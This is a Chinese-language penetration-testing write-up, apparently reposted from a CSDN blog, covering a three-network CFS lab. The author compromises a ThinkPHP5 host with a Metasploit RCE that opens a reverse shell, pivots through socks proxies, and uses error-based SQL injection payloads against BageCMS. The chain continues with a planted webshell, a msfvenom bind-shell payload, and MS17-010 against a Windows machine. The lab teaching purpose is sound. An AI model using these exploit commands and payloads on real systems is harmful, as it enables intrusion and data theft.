渗透测试之CFS三层靶机内网渗透
作者:互联网
一、环境搭建:
靶机拓扑:
1.添加虚拟网卡:
添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡
VMnet8为NAT模式与外部通信
2.配置网卡:
target1网络配置:
target2网络配置:
target3网络配置:
3.web靶机搭建(宝塔面板启动)
启动命令: /etc/init.d/bt start
重启 /etc/init.d/bt restart
默认端口管理8888
环境搭建完 kali能ping通target1 target1能ping通target2 target2能ping通target3 三层网络关系
二、渗透测试:
信息收集:
target1(thinkphp5搭建)
使用nmap扫描端口
nmap -sV -p 1-65535 -T4 192.168.234.178
因为是thinkphp5 想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭)
search thinkphp (查找可利用exp)
use 0 (选择exp)
set rhosts 192.168.234.178 (目标target1的ip)
set rport 80 (目标target1的端口)
set lhost 192.168.234.130 (shell接收ip 这里是kali本机ip)
set lport 4444 (shell接收端口)
run (执行exp)
执行返回一个shell target1拿下
信息收集
getuid
sysinfo
ifconfig
查看ip发现两个ip (22网段是内网网段)
使用msf添加路由
run autoroute -s 192.168.22.0 添加22网段路由
run autoroute -p 查看路由
已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;
使用sock4+proxychains4代理打通内网
use auxiliary/server/socks_proxy
options
set srvhost 192.168.234.130
set version 4a
还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加)
代理下使用namp扫描
proxychains4 nmap -Pn -sT 192.168.22.0/24
proxychains4 nmap -Pn -sT 192.168.22.129
内网还有web 配置kali浏览器sock代理
使用八哥CMS搭建
使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)
proxychains4 gobuster dir -u http://192.168.22.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
访问 robots.txt 发现目录
在index.php中发现sql注入提示
手工报错注入
爆数据库名:
index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+
爆表名:
index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+
最后爆出数据: admin 123qwe
md5解密后得到后台账号密码 admin 123qwe
登录后台 http://url/index.php?r=admini/default/index
内容模板写入shell
使用AntSword设置代理连接shell
信息收集 发现33网段
因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向马
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf
将马子赋执行权限上传到webshell中 同时使用代理开启一个msf
proxychains4 msfconsole
使用代理的msf开启监听
use exploit/multi/handler 使用监听模块
set payload linux/x86/meterpreter/bind_tcp 设置payload
set lport 4444 设置接收端口与msfvenoms生成端口一致
set rhost 192.168.22.129 设置目标主机(target2)
拿到 target2 shell
添加33网段路由
run autoroute -s 192.168.33.0/24
run autoroute -p
使用msf扫描模块扫描端口
use auxiliary/scanner/portscan/tcp
发现 192.168.33.33 主机并开放 445、3389 敏感端口
msf尝试永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010 检测ms17010是否存在
use exploit/windows/smb/ms17_010_psexe 利用ms17010
使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)
use auxiliary/admin/smb/ms17_010_command 这个exp可以执行命令
至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权;
标签:use,set,网段,渗透,192.168,shell,靶机,CFS,target1 来源: https://blog.csdn.net/LvHLong/article/details/123092182